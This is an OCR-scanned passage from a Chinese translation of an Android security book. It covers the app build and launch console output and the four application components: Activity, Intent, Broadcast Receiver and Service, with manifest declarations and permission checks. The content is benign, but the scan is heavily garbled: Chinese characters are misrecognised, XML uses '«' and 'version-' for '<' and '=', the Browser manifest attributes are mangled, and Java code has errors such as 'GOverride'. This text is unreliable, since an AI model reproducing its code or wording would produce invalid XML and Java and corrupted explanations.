2. 14 所 示 为 Eclipse 软件 的 Java 视图 下 的 控制 台 窗 口 。 从 图 中 可 见 ， 该 应 
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<?xml version-"1.0" encoding-"utf-8"?» 

«LinearLayout 

xmlns:android-"http://schemas.android.com/apk/res/android" 
android:layout  width-"fill parent" 
android:layout  height-"fill parent" 
android:orientation-"vertical" » 


«TextView 
android:layout  width-"fill parent" 
android:layout  height-"wrap _ content” 
android:text-"8string/hello" /> 


«/LinearLayout» 


代码 段 5 main. xml 文件 


«?xml version-"1.0" encoding-"utf-8"?» 
«resources» 


«string name-"hello"»5Hello World, 
HellloWorldActivity!«/string» 
«string name-"app _ name*»HellloWorld«e/Btrihss 


«/resources» 


代码 段 6 strings. xml 文件 


用 程序 (HelloWorld. apk) 在 模拟 器 启动 之 后 被 安装 在 模拟 器 上 ， 随 即 打开 此 应 
用 程序 的 Activity ， 也 就 是 com. androidsecrity. helloworld. HelloWorldActivity 类 。 EE 
要 注意 的 是 ， 该 Activity 是 通过 包 名 “com. androidsecurity. helloworld” 被 引用 和 
开启 的 。 


[2012-05-01 11:54:11 - HellioNorid] - PE 

[2012-85-01 11:54:11 - HellloWori4] hndroid i 

[2812-85-01 11:54:11 - HellloWorld] adb is running normally. 

~ WeliloWorid] Performing com ondroidsecuirty.helloworld.HellloWoeldActivity activity lounch 

- MellloWorld] Automatic Target Mode: Launching new emulotor with compotible AVO 'device-1* 

- HellloWorld] Launching à new emulotor with Virtual Device 'device-1' 

- Emulator) 2012-05-01 11:54:15,259 emulator are[9846-1107] Worning once: This application, or o librory it usas, is using NSQu1ickDrowV 
~ Mellloforld] Wew emulator found: emulotor-5554 

- MellloWorld] Waiting for HOME ('android.process.ocore') to be lounched... 

MellloWarid)] HOME ís up on device 'emulator-5554* 

~ MeliloWorid] Uploading MellloWorld.apk onto device 'emulator-5554' 

= MellloWorld] Installing Helllolorld.apk... 

- Helllofflorid] Success! 

- Melllolorld] Sterting activity com.androidseculrty.helloworld.HellloWorldActivity on device emulotor-5554 aiet 
- Helllomorld] ActivityMonager: Starting: Intent ( acteanéroid.intent,action. MAIN cot=[android.intent. category. LAUNCHER] cnp=com. andro 
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图 2.14 HelloWorld 应 用 程序 运行 时 的 控制 台 信 息 
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应 用 程序 用 到 的 Logcat 标签 的 设置 过 程 如 图 2. 15 所 示 。 
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图 2.15 HelloWorld 应 用 程序 的 Logcat 标签 设置 过 程 


2.5 小结 


本 章 主要 探讨 了 Android 软件 栈 及 其 中 各 层 ， 详细 分 析 了 Linux 内 核 及 Android 
系统 的 安全 机 制 。 讨 论 了 Zygote 和 Android 系统 的 局 动 过 程 ， 搭 建 了 Android 开发 
测试 环境 ， 介 绍 了 Android SDK 提供 的 各 种 工具 。 最 后 ， 以 一 个 典型 的 Android f£ 
序 为 例 ， 分 析 了 Android 项 目 与 应 用 程序 的 结构 。 通 过 本 章 ， 读 者 应 该 能 够 熟悉 
Android 软件 栈 上 的 各 种 术语 。 
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本 草 主 要 介绍 Android 应 用 程序 的 体系 结构 ， 构 成 应 用 程序 的 各 种 组 件 ， 并 使 
用 Logeat 工具 演示 这 些 组 件 在 应 用 程序 运行 时 是 如 何 工 作 的 。 随 后 ， 本 章 将 讨论 
Android 应 用 程序 生命 周期 的 各 个 阶段 。 在 本 章 绪 束 时 ， 读 者 将 能 够 描述 出 构成 
Android 应 用 程序 的 典型 组 件 ， 在 什么 时 候 可 以 使 用 这 些 组 件 ， 以 及 理解 应 用 程序 
生命 周期 的 各 个 阶段 。 


3.1 应 用 程序 组 件 


典型 的 Android 应 用 程序 通常 都 会 具有 丰富 的 功能 ， 例 如 内 置 的 时 钟 (Clock) 
应 用 程序 ， 其 基本 功能 包括 显示 时 间 (时 区 )、 设 置 闹钟 和 设置 秒表 。 在 时 钟 应 用 
程序 中 ， 主 要 有 三 个 不 同 的 屏幕 显示 界面 。 除 了 这 些 可 见 的 功能 外 ， 其 功能 还 包括 
同 后 端 服务 器 进行 通信 ， 用 以 更 新 时 间 、 在 后 台 运 行 Service 组 件 维 持 闹 钟 功能 ， 
以 及 同 内 置 处 理 器 时 钟 同步 等 。 因 此 ， 即 便 是 一 个 简单 的 Android 应 用 程序 ， 也 会 
有 多 个 构成 模块 。Android 应 用 程序 主要 有 四 种 组 件 : Activity (活动 ) Broadcast 
Receiver (广播 接收 器 ) Content Provider ( 内容 提供 者 ) 和 Service (服务 ) 。 这 些 
组 件 使 用 被 称 为 “Intent (意图 )” 的 消息 体 进行 彼此 交互 , 或 是 同 其 他 应 用 程序 
的 组 件 交 互 。 如 图 3. 1 所 示 ， 图 中 介绍 了 Android 应 用 程序 的 主要 组 件 。 


VM[ 应 用 程序 1] VM[ 应 用 程序 2] 


a de: Ja geo eph meats avem 
Activity Activi iita Activity 
UT T Service ^ 


Broadcast Receiver 


"eU yop e rarus 
Content Provider 





[3.1 Android 应 用 程序 组 件 


3.1.1 Activity 


基本 上 Activity 就 是 用 户 看 到 的 或 与 之 进行 可 视 交 互 的 屏幕 显示 界面 ， 是 An- 
droid 应 用 程序 的 可 视 用 户 接口 (User Interface，UI)。 大 多 数 的 应 用 程序 都 会 包 合 
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多 个 Activity， 每 一 个 Activity 对 应 一 个 用 户 能 够 看 到 的 或 与 之 交互 的 屏幕 显示 界 
面 ， 在 这 些 Activity 之 则 ， 用 户 可 以 随意 地 切换 。 在 这 种 无 颖 切换 效果 的 用 户 体 验 
下 ， 用 户 能 够 以 任何 顺序 〈 除 少量 例外 ) 启动 应 用 程序 中 不 同 的 Activity。 而 且 ， 
用 户 还 可 以 使 用 Intent. (有 关 Intent 的 内 容 在 本 章 后 续 部 分 中 会 介绍 到 ) 启动 其 他 
应 用 程序 的 Activity， 如 图 3.2 所 示 。Android 应 用 程序 启动 时 会 自动 打开 一 个 
Activity， 通 过 该 Activity ， 用 户 可 以 在 应 用 程序 中 的 不 同 Activity 或 组 件 之 间 切 换 。 
一 般 情 况 下 ， 应 用 程序 都 会 设计 一 种 使 用 户 能 够 回 到 上 一 个 Activity 界面 的 方式 。 
总 之 ， 通 过 Activity 提供 的 UI 屏幕 界面 ， 用 户 就 能 够 同 应 用 程序 进行 各 种 交互 ， 使 
用 应 用 程序 的 各 种 功能 。 应 用 程序 中 ， 一 些 常 见 的 Activity 使 用 例子 如 下 : 

e 应 用 程序 的 登录 界面 。 

e 创建 一 封 电 子 邮件 的 界面 。 

e 通过 电子 邮件 发 送 照片 的 界面 。 





图 3.2 Android 应 用 程序 之 间 的 Activity 交互 


MHEASA HZA Activity 组 成 。 当 应 用 程序 启动 时 ， 会 有 一 个 “main 
(Æ)” Activity 被 启动 ， 作 为 UI 显示 在 屏幕 上 ， 呈 现 给 用 户 。 

Activity 类 用 于 创建 屏幕 显示 界面 ， 程 序 开 发 者 可 以 使 用 setContentView 
(View) 函数 创建 UI 组 件 ， 也 就 是 屏幕 显示 界面 的 布局 。 创 建 自 定义 的 Activity 
类 ， 首 先 需要 继承 “Activity” 父 类 ， 然 后 再 在 自 定义 的 Activity 子 类 中 实现 ( 重 
写 ) 父 类 中 相应 的 回调 函数 ， 这 些 函 数 会 在 Activity 创建 ， 变 换 (如 暂停 、 终 止 
和 转 人 后 台 ) ， 以 及 销毁 时 被 系统 回调 并 执行 。Activity 类 有 很 多 的 回调 函数 ， 而 
OnCreate( ) 和 OnPause( ) 函数 是 其 中 最 重要 的 ， 也 是 使 用 最 频繁 的 回调 函数 。 

€ onCreate( Bundle) 函数 : 在 Activity 初始 化 时 调用 ， 每 个 Activity 类 都 需要 实 
现 这 个 函数 。 通 常 ， 在 该 图 数 内 调用 setContentView( int) KEX Activity 的 TUI 布 
局 ， 通 过 调用 函数 : findViewById(int), ， 获 取 本 地 资源 并 与 其 进行 交互 。 

€ onPause( ) 函数 : 当 用 户 离开 Activity 时 ， 调 用 此 图 数 ， 并 在 图 数 内 执行 Ac- 
tivity 状态 信息 存储 操作 ， 以 及 其 他 重要 的 操作 。 

此 外 ， 在 Activity 类 中 ， 还 有 一 些 其 他 的 重要 函数 ， 包 括 : onStart( ) onRe- 
start( ) onResume( ) , onStop( ) ， 以 及 onDestroy( ) 。 在 本 章 后 续 ， 讨 论 Activity 的 
生命 周期 时 ， 将 介绍 到 这 些 函 数 。 

在 代码 段 1 中 ， 定义 了 一 个 典型 的 Activity 类 ， 起 名 为 “ActivityA”。 该 类 先是 
继承 了 Activity 基 类 (BI Activity 类 ) ， 和 定义 了 一 些 私 有 成 员 变 量 。 然 后 ， 重 写 并 实 
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现 了 基 类 中 的 部 分 回调 函数 ， 尤 其 是 onCreate( ) 函数 。 在 onCreate( ) 函数 内 ，Ac- 
tivityA 类 通过 使 用 setContentView( ) 和 findViewById( ) 函数 定义 了 ActivityA 的 UI 界 
面 布 局 。 


public class ActivityA extends Activity { 


private String mActivityName; 

private TextView mStatusView; 

private TextView mStatusAllView; 

private StatusTracker mStatusTracker - 
StatusTracker.getInstance(); 


GOverride 
public void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity a); 
mActivityName = getString(R.string.activity a); 
mStatusView = (TextView)findViewById(R. 
id.status view a); 
mStatusAllView = 
(TextView)findViewById(R.id.status view all a); 
mStatusTracker.setStatus(mActivityName, 
getString(R.string.on  create)); 
Utils.printStatus(mStatusView, mStatusAllView); 
) 


代码 段 1  ActivityA 类 实现 的 onCreate( ) 函数 


在 Android 应 用 程序 中 ， 所 有 的 Activity 都 需要 在 Manifest 文件 内 声明 ， 否 则 将 
不 能 在 系统 中 注册 ， 未 声明 的 Activity 也 就 无 法 被 启动 。 

在 Manifest 文件 中 声明 Activity 的 实现 如 代码 段 2 所 示 。 使 用 < activity > 标签 
声明 Activity 类 ， 该 标签 是 < application > 标签 的 子 标签 。 在 < activity > 标签 内 ， 能 
EX Activity 的 属性 ， 如 属性 “android: name” 用 于 指定 声明 的 Activity 的 类 名 。 
此 外 ， 在 «activity > 标签 中 ， 还 可 以 包含 Intent 过 滤器 (通过 < intent- filter > 标签 
定义 )， 以 及 Activity 类 使 用 的 元 数据 。 


«application android:label-"G8string/app name" 
android:icon-"8(drawable/ic _ launcher"» 


«activity android:name-".ActivityA" 
android:launchMode-"singleTask"» 


«intent-filter» 
«action android:name-"android.intent.action.MAIN" /> 


«category android:name-"android.intent.category.LAUNCHER" /» 
«/intent-filter» 
«/activity» 
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«activity android:name-".ActivityB" /> 
«activity android:name-".ActivityC" /» - 
«/application» 


代码 段 2 Manifest 文件 中 的 Activity 声明 


Manifest 文件 需要 为 应 用 程序 所 有 的 Activity 统一 声明 一 个 启动 入 口 。 如 代码 段 2 
所 示 ， 该 应 用 程序 共有 三 个 Activity; ActivityA, ActivityB 和 AcetivityC。 其 中 ，Activ- 
ityA 是 主 (main) Activity， 当 打开 应 用 程序 时 ， 该 Activity 被 启动 。 而 且 ，ActivityA 还 
绑 定 了 一 个 Intent 过 滤器 ( < intent-filter > 标签 )， 其 action (动作 ) 和 category (类 
别 ) 分 别 被 设置 成 “MAIN” 和 “LAUNCHER"。 这 样 ， 就 可 以 让 Android 系统 的 
Launcher? 程序 获得 这 个 Activity， 继 而 使 用 户 能 够 借 此 启动 该 应 用 程序 。 

Manifest 文件 内 的 其 他 Activity 属性 的 详细 信息 请 参阅 下 述 网 站 : http: //de- 
veloper. android. com/ guide/ topics/ manifest/ activity- element. html 

由 于 Android 应 用 程序 可 以 局 动 其 他 应 用 程序 的 Activity。 因 此 ， 需 要 对 这 种 特 
定 的 能 力 进 行 限制 ， 也 就 是 限制 其 他 应 用 程序 对 指定 Activity 的 局 动能 力 。 在 Man- 
ifest 文件 中 ， 通 过 设置 权限 来 实现 对 这 种 路 应 用 程序 局 动 Activity 的 限制 。 其 他 应 
用 程序 需要 使 用 “use- permission ”权限 标签 ， 请 求 对 相应 权限 功能 的 访问 。Activi- 
ty 可 以 使 用 < activity > 标签 的 “android: permission" 属性 设置 Activity 的 权限 ， 限 
制 其 他 应 用 对 该 Activity 的 启动 。 当 其 他 应 用 程序 调用 Context. startActivity ( ) 函数 
或 Activity. startActivityForResult( ) KUA 5I% Activity 时 ， 系 统 会 查看 其 权限 ， 若 调 
用 者 不 具有 该 权限 ， 启 动 Activity 的 请 求 会 被 拒绝 。 


3.1.2 Intent 


Intent 是 用 于 激活 其 他 应 序 组 件 (如 Activity, Service 和 Broadcast Receiv- 
er) 的 消息 体 ， 描 述 了 需要 执 pads 借助 Intent, Android 系统 提供 了 一 
种 在 运行 之 后 的 应 用 程序 组 件 之 间 的 绑 定 机 制 ， 这 种 机 制 既 可 以 在 同一 个 应 用 程序 
的 组 件 之 间 运 行 ， 也 可 以 在 不 同 的 应 用 程序 组 件 之 间 运 行 。Intent 本 身 就 是 一 个 包 
含 信息 的 对 象 ， 这 些 信息 可 以 是 需要 执行 的 操作 信息 ， 或 者 对 于 Broadcast Receiver 
组 件 来 说 ， 也 可 以 是 发 生 事 件 的 详细 信息 。 

以 纽约 时 报应 用 程序 为 例 ， 在 这 个 应 用 程序 中 ， 有 三 个 不 同 的 Activity， 一 个 
用 于 显示 文章 列表 ， 另 一 个 用 于 显示 文章 内 容 ， 还 有 一 个 对 话 框 Activity， 提 供给 
用 户 用 来 标记 喜爱 的 文章 等 。 该 应 用 程序 还 可 以 通过 发 送 含 有 文章 链接 电子 邮件 ， 


© Launcher, B[ Android 系统 的 应 用 程序 启动 器 ， 是 Android 系统 内 置 的 应 用 ， 用 于 显示 安装 在 Android 
设备 上 的 所 有 应 用 程序 。 一 一 译 者 注 
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和 他 人 共享 指定 文 草 。 如 图 3.3 所 示 ， 通 过 Intent 可 以 让 用 户 在 不 同 的 Activity 之 
间 切 换 ， 同 应 用 程序 进行 交互 。 
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** Ear a = 1 - 
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3.3 [Intent 用 法 


不 同 的 应 用 程序 组 件 ， 如 Service, Activity 或 Broadcast Receiver, A3* Intent 对 
象 时 调用 的 函数 也 各 不 相同 ， 见 表 3. 1 。 


表 3.1 发 送 Intent 的 函数 
应 用 程序 组 件 Ku 
Context. startActivity ( ) 
Activity Activity. startActivtyForResult( ) 
Activity. setResult( ) 


Context. startService( ) 


Service 
Context. bindService( ) 
Context. sendBroadcast( ) 
Broadcast Receiver Context. sendOrderedBroadcast (. ) 


Context. sendStickyBroadcast( ) 


Intent 对 象 (消息 体 ) 是 一 种 数据 结构 ， 它 被 设计 用 来 存储 事件 信息 或 执行 的 
操作 信息 ， 主 要 包含 两 部 分 信息 内 容 : 

e 执行 的 动作 (Action) 。 

e 执行 动作 相关 的 数据 ， 以 URI (Uniform Resource Identifier， 统 一 资源 标识 ) 
的 形式 表示 。 

下 面 是 几 组 Intent 包含 的 动作 /数据 对 的 例子 : 

€ ACTION . DIAL content; //contacts/ people/ 1 

将 此 人 的 电话 号 码 显 示 在 电话 拨号 器 上 ， 拨 号 呼叫 。 

€ ACTION_ DIAL tel:123 

将 号 码 123 显示 在 电话 拨号 器 上 ， 进 行 呼叫 。 

此 外 ，Intent 对 象 还 可 以 提供 其 他 的 信息 ， 如 下 所 示 : 

@ Category: 指定 执行 动作 的 类 别 信 息 。 当 设置 为 CATEGORY. LAUNCHER 
时 ， 表 示 接 收 Intent 的 Activity 存在 于 Android 系统 的 Launcher 程序 中 。 

€ Type: 明确 指定 Intent 的 数据 类 型 ， 无 需 系 统 判定 。 

@ Component: 指定 处 理 该 Intent 的 目标 组 件 的 名 称 ， 非 必须 项 。 MEAS 
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时 ， 系 统 会 使 用 Bundle 中 的 其 他 信息 确定 匹配 的 目标 组 件 。 

@ Extras: 附加 信息 的 集合 ， 使 用 android. os. Bundle 类 封装 这 些 信息 内 容 。 

通过 这 些 属性 ，Intent 能 够 表示 各 种 操作 和 事件 。 例 如 ，Activity 可 以 回电 子 邮 
件 应 用 程序 (e-mail) 发 送 一 个 包含 电子 邮件 地 址 的 Intent 对 象 ， 撰 写 新 的 邮件 。 
Intent 主要 分 为 两 种 不 同 的 类 型 ， 显 式 类 型 的 Intent 和 隐 式 类 型 的 Intent。 

显 式 类 型 的 Intent 中 明确 指出 需要 激活 的 组 件 名 称 ( 对 应 的 类 名 )。 一 般 情况 
F5 由 于 应 用 程序 并 不 知道 其 他 应 用 程序 内 组 件 的 名 称 ， 因此 这 种 类 型 的 Intent 38 
第 用 在 同一 个 应 用 程序 的 内 部 组 件 之 间 。 典 型 的 显 式 类 型 Intent 的 调用 形式 如 下 : 

Intent i = new Intent( this, < activity name >. class) ; 

相反 ， 隐 式 类 型 的 Intent 用 于 激活 其 他 不 同 应 用 程序 的 组 件 。 例 如 ， 照 片 应 用 
程序 (Photo) 向 电子 邮件 应 用 程序 (e-mail) 发 送 电子 邮件 Intent 对 象 ， 从 而 使 用 
电子 邮件 发 送 照片 。 这 种 类 型 的 Intent 不 需要 提供 目标 组 件 的 名 称 ， 而 是 通过 系统 
解析 ;找到 与 之 匹配 的 目标 组 件 。Itent 解析 机 制 主要 通过 组 件 提供 的 Intent 3:1 7E 
AEM, Intent 过 滤器 用 于 告知 系统 该 组 件 能 够 处 理 哪 些 Intent 对 象 。 系 统 将 Intent 
对 象 同 过 滤器 进行 比较 ， 从 而 选 出 相 匹配 的 目标 组 件 交 付 Intent 对 象 。Intent 过 渡 
句 提 供 了 一 种 机 制 ， 使 组 件 可 以 指定 其 希望 处 理 的 Intent 对 象 ， 这 可 以 用 于 限制 对 
某 些 组 件 的 激活 。 例 如 ， 当 组 件 没有 设 定 Intent 过 滤 龙 时， 那么 它 只 能 接收 显示 类 
型 的 Intent 对 象 。 但 有 一 点 需要 注意 的 是 ， 不 要 依赖 于 Intent 过 滤 套 作为 确保 软件 
安全 的 手段 ， 因 为 别人 总 是 会 有 办 法 发 送 显 式 类 型 的 Intent 给 它 ， 从 而 绕 过 Intent 
过 滤 机 制 。 因 此 ， 需 要 为 组 件 定 义 特 定 的 权限 ， 限 制 通 过 Intent 对 特定 组 件 的 访 
问 。 而 且 ， 最 好 只 使 用 Intent 对 象 传 递 有 限 的 数据 。 对 于 敏感 的 信息 ， 比 如 密码 等 
信息 ， 绝 对 不 能 使 用 Intent 对 象 传递 ， 因 为 它们 很 有 可 能 会 被 恶意 组 件 接收 。 

典型 的 隐 式 类 型 的 Intent 对 象 调用 形式 如 下 : 

Intent I = new Intent( Intent. ACTION_VIEW , Uri. parse( http://www. google. com) ) ; 

当 系 统 将 Intent 对 象 和 过 滤 需 进行 比较 时 ， 系 统 主要 测试 /比较 Intent 对 象 内 的 
三 个 字段 ， 见 表 3.2。 因 此 ， 和 希望 获得 Intent 对 象 的 组 件 需要 在 它 的 Intent 过 滤器 
中 提供 相应 字段 信息 。 

表 3.2 Intent 字段 及 其 说 明 
Intent 字段 用 x 
执行 动作 的 名 字 或 已 经 发 生 的 事件 名 字 构 成 的 字符 串 ， 如 ACTION, CALL, ACTION - 


yy TIMEZONE_CHANGED 
执行 动作 相关 的 操作 数据 ， 包 括 URI 和 MIME 两 种 类 型 的 数据 。 例 如 ，ACTION _ 
Data VIEW 动作 一 般 关 联 URL 类 型 的 数据 ，ACTION_CALL 则 需要 处 理 与 相关 联 的 tel; data 
类 型 的 数据 
ne 提供 有 关 处 理 / 服 务 Intent 对 象 的 目标 组 件 类 别 的 附加 信息 一般 为 CATEGORY _ 


HOME, CATEGORY LAUNCHER, CATEGORY BROWSABLE 等 
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图 3.4 和 图 3. 5 显示 的 分 别 是 电话 (Phone) 应 用 程序 和 浏览 器 (Browser) 应 
用 程序 的 Manifest. xml 文件 内 容 ， 这 两 个 应 用 程序 都 是 Android 系统 内 置 的 应 用 程 
序 。 因 此 ， 其 他 的 应 用 程序 可 以 使 用 它们 拨打 电话 和 浏览 网 页 。Phone 应 用 程序 提 
供 了 多 个 Intent 过 滤器 ， 可 以 处 理 多 个 Intent 动作 ， 如 与 “tel. ”类 型 数据 相关 联 
的 android. intent. action CALL 动作 。 当 某 个 应 用 程序 试图 拨打 电话 时 ， 将 向 Phone 
应 用 程序 发 送 关 联 该 数据 类 型 ( 即 电话 号 码 ) 的 Intent 对 象 。 Browser 应 用 程序 提 
供 了 用 于 处 理 android. intent. action. VIEW 动作 的 Intent 过 滤器 等 ， 这 使 其 他 应 用 程 
JF REM ja] Browser 应 用 程序 发 送 URL 地 址 。 
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3.4 Phone 应 用 程序 的 Manifest. xml 文件 


«aczivicty anzdrcid:thete-2"*sgtyle/BrowserTheme" anarcid:lerel-"8$string/application name" andrcid:name-"BrowserActivity" 

«inrcent-filter» 
«acticnr android:name-"android.intent.acti:ion.VIEW" /> 
«cacegory android:nzare€9"android.intent.category.DEFAULT" /> 
«cavegory &rz3roid:;ramres"android.intent.category.BROWSABLE"^ /> 
<data asndroid:scheme»"http" /> 
«data androcid:schemse-9"https" /> 
«data android:scheme*e"abount" /> 
«dacs andrzoid:scheme-"javasocript" /> 

«/intent-filter» 

«incent-filter» 
«aczicm andrzid:name-"android.intent.action,VIEW" /> 
«cacegory androidj:nsre9"android.intent,category.BROWSABLE" /> 
ccategory andárc-d:nzares-"android.intent.category.DEFAULT" /> 
«data asndroid:schemee"http" /> 
«data android:schemse9"https" /> 
«data aniroid:schemee"inline" /> 
«datas androild:mcmelypes"text/htm]" /> 
«dat& androcij:mime.ypee"text/piain" /> 
«data android:mireTypew€-"application/xhtmlexml" /> 
«data an2roid:mirelyps*""application/vnd,wap.xhrtml4xml" /> 

| «/intent-filter» 


3.5 Browser 应 用 程序 的 Manifest. xml 文件 


3.1.3 Broadcast Receiver | 
Broadcast Receiver 用 于 处 理 Intent X128 , 该 组 件 通过 订阅 特定 的 Intent 对 象 指 
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定 的 动作 ， 作 为 Android 应 用 程序 同系 统 组 件 之 间 相 互通 信 的 一 种 方式 。 在 收 到 激 
活 的 Intent 对 象 之 前 ，Broadcast Receiver 保持 睡眠 状态 。 激 活 之 后 ，Broadcast Re- 
ceiver 将 执行 特定 的 动作 。Android 系统 和 应 用 程序 都 可 以 对 外 广播 Intent 对 象 。 不 
过 ， 只 有 在 安全 权限 之 内 ,订阅 了 这 些 Intent 对 象 指定 动作 的 组 件 才 能 够 接收 到 。 
当 Intent 对 和 象 被 广播 出 去 后 ， 只 有 具备 所 需 权限 且 已 经 订阅 了 该 Intent 对 象 指定 动 
作 的 Broadcast Receiver 才能 被 系统 激活 ， 接 收 该 Intent 对 象 并 执行 相应 操作 。 

Android 系统 自 带 了 多 种 系统 事件 (如 电池 电量 低 、 收 到 电话 或 短信 等 事件 )， 
作为 Intent 对 象 内 部 Action 字段 的 动作 值 ， 由 系统 以 广播 Intent 对 象 的 形式 对 外 发 
布 。 如 下 是 一 些 Android 系统 自 带 的 广播 Intent 动作 : 

€ ACTION TIME TICK 

€ ACTION TIME CHANGED 

€ ACTION TIMEZONE CHANGED 

e ACTION BOOT COMPLETED 

€ ACTION PACKAGE ADDED 

€ ACTION PACKAGE CHANGED 

@ ACTION PACKAGE REMOVED 

@ ACTION PACKAGE RESTARTED 

€ ACTION PACKAGE DATA CLEARED 

€ ACTION UID REMOVED 

€ ACTION BATTERY CHANGED 

e ACTION POWER. CONNECTED 

@ ACTION POWER. DISCONNECTED 

@ ACTION SHUTDOWN 

作为 Android z&AZE P] EKMAHEF Z —, Mep (Alarm). 应 用 程序 订阅 的 系统 
广播 动作 主要 有 两 种 ACTION _TIME CHANGED 和 ACTION _ TIMEZONE _ 
CHANGED, Broadcast Receiver 组 件 本 身 不 具有 用 户 界面 ， 但 是 应 用 程序 可 以 在 Ac- 
tivity 类 中 通过 onReceive( ) 回调 函数 接收 广播 并 执行 相应 的 操作 。 这 时 ， 该 Activity 
类 需要 继承 android. content. BroadcastReceiver 类 ， 并 且 重 写 父 类 的 onReceive ( ) 
PEL s 

Android 应 用 程序 可 以 回 己 或 其 他 应 用 程序 发 送 广播 Intent。 不 过 ， 需 要 在 
Manifest. xml 文件 中 注册 这 些 Broadcast Receiver 组 件 ， 才 能 将 应 用 程序 注册 到 
Android 系 统 中 ， 从 而 接收 特定 的 广播 Intent 动作 。 以 时 钟 (Time) 应 用 程序 为 例 ， 
要 想 接 收 ACTION. TIME CHANGED 和 ACTION. TIMEZONE. CHANGED 广播 Intent 
动作 ， 需 要 在 Time 应 用 程序 的 Manifest. xml 文件 中 声明 上 述 注册 及 订阅 的 事件 动 
作 。 这 样 ， 该 程序 的 Broadcast Receiver 才能 注册 到 Android 系统 中 ， 当 订阅 的 事 
件 动作 发 生 时 ， 再 由 系统 激活 该 程序 的 Broadcast Receiver; Time 应 用 程序 的 
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Broadcast Receiver £H fF. " TimeReceiver 2S" ££ Manifest. xml 文件 中 声明 的 注册 如 
代码 段 3 所 示 ， 该 类 重 写 了 父 类 (android. content. BroadeastReceiver 类 ) 的 回调 
ER onReceive( ) 。 

要 想 接 收 特定 广播 发 出 的 Intent， 需 要 明确 地 请 求 所 需 的 权限 。 


«receiver android:name = ".TimeReceiver"» 
«intent-filter» 
«action 
android:name-android.intent.action.TIME | CHANGED"/» 


«action : 
android:name-android.intent.action.TIME | ZONE  CHANGED"/» 
«/intent-filter» 
«/receiver» 


代码 段 3 注册 了 Broadcast Receiver 组 件 


对 于 一 些 特定 的 广播 Intent 动作 ， 应 用 程序 需要 请 求 所 需 的 权限 才能 接收 。 例 
如 ， 接 收 BOOT COMPLETED 广播 Intent 动作 ， 则 需要 应 用 程序 具有 RECEIVE 
BOOT COMPLETED 权限 。 此 外 ，Broadcast Receiver 的 一 些 权 限 能 够 限制 加 关联 的 
Broadcast Receiver 组 件 交 付 广 播 的 Intent 对 象 。 例 如 ， 当 系统 试图 和 问 Broadcast 
Receiver 组 件 交 付 广播 Intent 对 象 时 ， 首 先 会 检查 Broadcast Receiver 的 权限 。 如 果 
该 Broadcast Receiver 没有 所 需 权 限 ， 则 系统 会 取消 向 其 交付 该 广播 的 Intent 对 象 。 


3.1.4 Service 


Service 是 用 于 Android 应 用 程序 在 后 台 执 行 耗 时 操作 的 组 件 ， 它 没有 用 户 务 
面 ， 仅 在 后 台 执 行 任 务 ， 如 闹钟 、 音 乐 播放 器 应 用 程序 等 。 其 他 的 Android 应 用 程 
序 可 以 在 前 台 运行 ， 然 而 Service 只 能 在 后 台 运 行 ， 甚 至 当 用 户 切 换 到 其 他 的 应 用 
程序 组 件 或 应 用 程序 时 。 而 且 ， 应 用 程序 组 件 可 以 通过 将 自己 “ 绑 定 ”到 Service 
上 ， 与 它 在 后 台 交 互 。 例 如 ， 某 个 应 用 程序 组 件 可 以 绑 定 到 音乐 播放 需 的 Service 
上 ,在 需要 时 同 它 进行 交互 。 因 此 ，Service 可 以 有 两 种 状态 : 启动 和 绑 定 。 

应 用 程序 组 件 可 以 调用 startService ( ) 函数 启动 一 个 Service， 此 时 该 Service 处 
于 “启动 ”状态 。 只 要 Service 被 启动 ， 就 会 在 后 台 运 行 ， 甚 至 当 启动 它 的 组 件 或 
所 在 的 应 用 程序 不 再 运行 后 ，Service 仍 将 继续 运行 。 

应 用 程序 组 件 可 以 调用 bindService( ) 函数 绑 定 到 Service 上 ， 绑 定 的 Service 通 
常 被 用 作客 户 端 / 服 务 器 机 制 ， 同 应 用 程序 组 件 进 行 交 互 。 绑 定之 后 ，Service 同 与 
其 绑 定 的 组 件 一 同 运行 。 一 旦 解 绑 ，Servwice 即 终止 销毁 。 所 有 的 应 用 程序 组 件 或 
其 他 应 用 程序 只 要 取得 所 需 权 限 ， 都 可 以 通过 Intent 启动 或 绑 定 一 个 Service. 

自 定义 的 Service 必须 要 继承 Service 基 类 ， 并 且 实 现 基 类 中 相应 的 回调 函数 。 
Service 类 中 几 个 重要 的 回调 函数 包括 : onStartCommand( ) , onBind( ) , onCreate ( ) 
和 onDestroy( ) 。 
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€ onStartCommand( ) 

当 其 他 应 用 程序 组 件 调 用 startService ( ) 函数 启动 Service 时 ， 该 回调 函数 由 系 
统 调用 。 随 后 Service 开始 运行 ， 直 到 stopSelf( ) 函数 或 stopService ( ) 函数 被 调用 
时 终止 。 

€ onBind( ) 

当 其 他 应 用 程序 组 件 调 用 bindService( ) 函数 同 Service 绑 定 时 ， 回 调 该 函数 。 

€ onCreate( ) 

当 Service 首次 创建 时 ， 回 调 该 函数 执行 初始 化 设置 。onCreate( ) 函数 在 on- 
StartCommand( ) 或 onBind( ) 函数 调用 之 前 执行 。 | 

€ onDestroy ( ) 

Service Zim EB, [y XE. 

需要 注意 的 是 ， 当 Android 需要 回收 系统 资源 时 ， 系 统 会 终止 Service。 例 如 ， 
在 系统 内 存 空间 不 足 的 情况 下 。 同 其 他 组 件 一 样 Service 也 需要 在 Manifest. xml X 
件 中 声明 。 在 Manifest. xml 文件 内 使 用 < application > 的 子 标签 < service > 声明 Serv- 
ice， 如 代码 段 .4 所 示 。 其 中 ，android: name 属性 指定 声明 的 Service 类 名 ， 如 果 
Service 中 定义 了 Intent 过 滤器 ， 那 么 其 他 应 用 程序 也 可 以 通过 隐 式 类 型 的 Intent 油 
活该 Service。 


«manifest» 


«application .> 
«service android:name -".ServiceName /» 


«/application» 
«/manifest» 


代码 段 4 Service TE Manifest 文件 中 声明 


同 其 他 应 用 程序 组 件 一 样 ， 可 以 使 用 < service > 标签 内 定义 的 权限 限制 应 用 程 
序 对 该 Service 的 启动 或 绑 定 。 当 应 用 程序 调用 Context. startService ( ) 、 Context. 
stopService( ) 或 Content. bindService( ) 函数 操作 目标 Service 时 ， 系 统 会 检测 调用 者 
权限 ， 如 果 调 用 者 没有 所 需 的 权限 ， 则 拒绝 相应 操作 的 请 求 。 


3.1.5 Content Provider 


Content Provider 提供 了 一 种 不 同 应 用 程序 之 间 共 享 持久 数据 的 方式 ， 每 一 个 
Content Provider 都 可 以 看 作 一 个 数据 仓库 ， 其 他 应 用 程序 可 以 通过 定义 Content Pro- 
